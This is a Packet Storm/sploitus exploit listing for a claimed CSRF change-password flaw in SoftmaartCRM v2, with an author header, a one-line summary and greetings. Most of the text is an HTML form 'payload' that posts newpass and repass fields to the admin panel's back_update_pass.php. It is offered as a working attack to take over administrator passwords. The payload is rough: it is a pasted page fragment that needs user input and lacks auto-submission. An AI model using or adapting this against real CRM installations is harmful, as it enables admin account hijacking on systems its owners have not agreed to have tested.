Share
## https://sploitus.com/exploit?id=PACKETSTORM:225160
==================================================================================================================================
    | # Title     : SoftmaartCRM v2 CSRF vulnerability                                                                               |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://softmaart.com/best-website-design-company.php                                                            |
    ==================================================================================================================================
    
    [+] Summary    : SoftmaartCRM v2 suffer from CSEF Change password vulnerability.
    
    [+] payload    : 
    
    </b></span>
                            </div>
                            <div class="panel-body">
                                <div class="row">
                                    <div class="col-lg-3"></div>
                                     <div class="col-lg-6">
                                         <form method="post" action="https://127.0.0.1/admin_panel/back_update_pass.php">
                                             <div class="row">
                                                 <div class="col-lg-12">
                                                     <div class="form-group">
                                                         <label>Enter New password</label>
                                                         <input class="form-control" required="" maxlength="100" placeholder="Enter here" name="newpass" type="password">
                                                     </div>
                                                 </div>
                                                 <div class="col-lg-12">
                                                     <div class="form-group">
                                                         <label>Re-Enter password</label>
                                                         <input class="form-control" required="" maxlength="100" placeholder="Enter here" name="repass" type="password">
                                                     </div>
                                                 </div>
                                                 <div class="col-lg-12">
                                                     <div class="form-group">
                                                         <input type="submit" value="ADD" class="btn btn-success form-control">
                                                     </div>
                                                 </div>
                                                 <div class="col-lg-12">
                                                     <div class="form-group">
    
                                                         <span id="error_msg" style="color: red;"></span>
                                                     </div>
                                                 </div>
                                             </div>
                                         </form>
    
                                     </div>
                                    <div class="col-lg-3"> </div>
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================